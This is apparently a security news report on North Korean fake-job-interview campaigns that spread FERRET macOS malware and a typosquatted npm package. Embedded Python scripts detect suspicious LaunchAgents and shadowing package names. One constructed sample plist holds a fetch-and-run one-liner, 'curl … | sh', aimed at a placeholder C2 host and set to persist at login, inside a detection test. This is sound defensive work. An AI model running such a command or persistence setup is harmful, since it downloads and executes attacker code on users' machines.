North Korean Hackers Use Fake Job Interviews to Deploy FERRET Malware on macOS

Feb 04, 2025 | Ravie Lakshmanan | Malware / Cryptocurrency

Threat actors behind the North Korea-linked Contagious Interview campaign have been observed delivering a family of Apple macOS malware strains dubbed FERRET as part of a fake job interview process.

In a new report, SentinelOne researchers Phil Stokes and Tom Hegel said that "targets are usually asked to speak with an interviewer through a link that displays an error message and a request to install or update some essential software such as VCam or CameraAccess for online meetings."

Contagious Interview, first documented in late 2023, is a sustained effort by the hacking group to deliver malware to prospective targets through bogus npm packages and native apps masquerading as videoconferencing software. The activity is also tracked as DeceptiveDevelopment and DEV#POPPER.

These attack chains are designed to drop a JavaScript-based malware known as BeaverTail which, in addition to harvesting sensitive data from web browsers and cryptocurrency wallets, is capable of delivering a Python backdoor named InvisibleFerret.

Chinese cybersecurity firm NTT Security Holdings revealed in December 2024 that the JavaScript malware is also configured to retrieve and execute another piece of malware.

The FERRET family of malware, first observed toward the end of 2024, indicates that the threat actors are continuously refining their tactics to evade detection.

Under the pretext of fixing a problem with camera and microphone access in the web browser, users are tricked into copying and running a malicious command in the Terminal app on their Apple macOS systems.

The attacks begin with the attackers approaching targets on LinkedIn, posing as recruiters and urging them to complete a video assessment, according to security researcher Taylor Monahan (@tayvano_). The end goal is to install malware that runs commands on the host and drains the victim's MetaMask wallet.

Some of the components used by the malware are tracked as FRIENDLYFERRET and FROSTYFERRET_UI. SentinelOne said it also identified a second set of artifacts called FlexibleFerret that uses a LaunchAgent to establish persistence on the infected macOS system.

It is also engineered to download an unspecified payload from a command-and-control (C2) server that is no longer responsive.
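LaunchAgent persistence of the kind attributed to FlexibleFerret leaves a plist in the user's LaunchAgents directory, which is something a defender can audit directly. The following Python script is an added example, not SentinelOne's code and not FlexibleFerret's actual artifact: it applies generic heuristics for ~/Library/LaunchAgents (shell one-liners, curl-piped-to-shell commands, references to temporary paths, Apple-style labels outside Apple's own directory, and RunAtLoad plus KeepAlive). The two sample plists and the host c2.invalid are constructed so the script runs offline.

```python
"""Audit per-user macOS LaunchAgent plists for persistence red flags.

Added example, not SentinelOne's code. The indicators are generic
heuristics for ~/Library/LaunchAgents, not FlexibleFerret's actual plist.
SAMPLE_BENIGN and SAMPLE_SUSPICIOUS are constructed plists so the script
runs offline; point audit_launch_agents() at a real directory on a host.
"""
from __future__ import annotations

import plistlib
import re
import tempfile
from pathlib import Path

SHELLS = ("/bin/sh", "/bin/bash", "/bin/zsh")
# Locations a legitimate user LaunchAgent rarely executes from.
WRITABLE_PATHS = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
# "fetch remote content and pipe it into an interpreter" one-liners.
REMOTE_EXEC_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh|python3?)\b")

# Constructed samples (not real artifacts).
SAMPLE_BENIGN = plistlib.dumps({
    "Label": "com.example.sync",
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/sync", "--background"],
    "RunAtLoad": True,
})
SAMPLE_SUSPICIOUS = plistlib.dumps({
    "Label": "com.apple.camera.helper",  # Apple-style label in a user directory
    "ProgramArguments": ["/bin/sh", "-c", "curl -s http://c2.invalid/p | sh"],
    "RunAtLoad": True,
    "KeepAlive": True,
})


def analyze_agent(plist_bytes: bytes) -> list[str]:
    """Return human-readable findings for one LaunchAgent plist, assumed to
    come from ~/Library/LaunchAgents (Apple's own agents never live there)."""
    try:
        agent = plistlib.loads(plist_bytes)
    except Exception:  # InvalidFileException, XML parse errors, etc.
        return ["unparseable plist"]

    findings = []
    label = str(agent.get("Label", ""))
    args = [str(a) for a in agent.get("ProgramArguments") or []]
    program = args[0] if args else str(agent.get("Program", ""))
    cmdline = " ".join(args)

    if program in SHELLS:
        findings.append("launches a shell one-liner instead of a binary")
    if REMOTE_EXEC_RE.search(cmdline):
        findings.append("fetches remote content and pipes it to an interpreter")
    if any(tok.startswith(WRITABLE_PATHS) for tok in cmdline.split()):
        findings.append("references a temporary or world-writable path")
    if label.startswith("com.apple."):
        findings.append(f"Apple-style label '{label}' outside /System/Library/LaunchAgents")
    # Relaunch-at-login plus auto-restart is only worth noting alongside other flags.
    if findings and agent.get("RunAtLoad") and agent.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive: relaunches at login and if killed")
    return findings


def audit_launch_agents(directory: Path) -> dict[str, list[str]]:
    """Map each *.plist in `directory` to its findings (empty list = clean)."""
    return {p.name: analyze_agent(p.read_bytes()) for p in sorted(directory.glob("*.plist"))}


def audit_constructed_samples() -> dict[str, list[str]]:
    """Write the two constructed samples to a temp dir and audit that dir."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        (d / "com.example.sync.plist").write_bytes(SAMPLE_BENIGN)
        (d / "com.apple.camera.helper.plist").write_bytes(SAMPLE_SUSPICIOUS)
        return audit_launch_agents(d)


if __name__ == "__main__":
    target = Path.home() / "Library" / "LaunchAgents"
    results = audit_launch_agents(target) if target.is_dir() else audit_constructed_samples()
    for name, findings in results.items():
        print(name, "->", "; ".join(findings) or "no findings")
```

Every finding here is a heuristic meant to prioritise human review, not a verdict: plenty of legitimate agents use /bin/sh, so the script only escalates the RunAtLoad/KeepAlive combination when another indicator is already present, and the clean sample produces no findings at all.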

The FERRET malware has additionally been observed propagating via fake GitHub repositories, marking another shift in the group's distribution tactics.

This suggests the threat actors are willing to expand their distribution methods beyond the specific targeting of job seekers to developers more broadly, the researchers said.

The disclosure follows a report from supply chain security firm Socket about a malicious npm package named postcss-optimizer that contains the BeaverTail malware. As of writing, the library is still available for download from the npm registry.

"By impersonating the legitimate postcss library, which has over 16 billion downloads, the threat actor aims to infect developers' systems with credential-stealing and data-exfiltration capabilities across Windows, macOS, and Linux systems," security researchers Kirill Boychenko and Peter van der Zee said.
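The postcss-optimizer package rides on the name of a package almost every front-end project already depends on, so a pre-install check of the manifest is a cheap defensive control. The Python script below is an added example, not Socket's tooling: it flags dependencies in a package.json that extend or sit one edit away from a well-known package name and are not on an explicit allowlist. KNOWN_PACKAGES, ALLOWLIST and the sample manifest are constructed for illustration; a real deployment would feed them from an internal approved-package inventory.

```python
"""Flag npm dependencies whose names shadow well-known packages.

Added example (not Socket's tooling). KNOWN_PACKAGES, ALLOWLIST and
SAMPLE_PACKAGE_JSON are constructed illustrative data; the real lists
would come from an internal approved-package inventory.
"""
import json
from typing import Dict, Optional

# Popular packages worth protecting against name shadowing (constructed set).
KNOWN_PACKAGES = {"postcss", "lodash", "react", "express", "axios"}
# Legitimate add-ons that reuse a known name as a prefix (constructed set).
ALLOWLIST = {"postcss-cli", "postcss-loader", "react-dom", "express-session"}

# Constructed manifest: postcss-optimizer is the package named on the page;
# "loadash" is a made-up near-miss for lodash.
SAMPLE_PACKAGE_JSON = """
{
  "dependencies": {
    "postcss": "^8.4.0",
    "postcss-optimizer": "1.0.0",
    "lodash": "^4.17.21"
  },
  "devDependencies": {
    "postcss-cli": "^11.0.0",
    "loadash": "0.1.0"
  }
}
"""


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(name: str) -> Optional[str]:
    """Return a reason string if `name` looks like it shadows a known package."""
    if name in KNOWN_PACKAGES or name in ALLOWLIST:
        return None
    for known in sorted(KNOWN_PACKAGES):
        # "postcss-optimizer", "postcss_utils", "my-postcss": name built around a known one.
        if name.startswith((known + "-", known + "_")) or name.endswith("-" + known):
            return f"extends well-known package name '{known}' and is not allowlisted"
        # Typosquat: one character away from a reasonably long known name.
        if len(known) >= 5 and levenshtein(name, known) == 1:
            return f"one edit away from '{known}'"
    return None


def audit_package_json(text: str) -> Dict[str, str]:
    """Return {dependency: reason} for every suspicious name in a manifest."""
    manifest = json.loads(text)
    deps = {}
    for section in ("dependencies", "devDependencies"):
        deps.update(manifest.get(section, {}))
    flagged = {}
    for name in sorted(deps):
        reason = classify(name)
        if reason:
            flagged[name] = reason
    return flagged


if __name__ == "__main__":
    for dep, why in audit_package_json(SAMPLE_PACKAGE_JSON).items():
        print(f"{dep}: {why}")
```

Run as a CI step before `npm install`, the check stops on exactly the two constructed bad entries (postcss-optimizer and loadash) and lets postcss-cli through because it is allowlisted; the allowlist is what keeps the prefix rule from drowning reviewers in legitimate plugins.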

The North Korea-aligned APT37 (aka ScarCruft) threat actor has also been linked to a new campaign that involved distributing booby-trapped documents via spear-phishing to deploy the malware, as well as sending them to other targets via group chats on the K Messenger platform from the compromised user's computer.
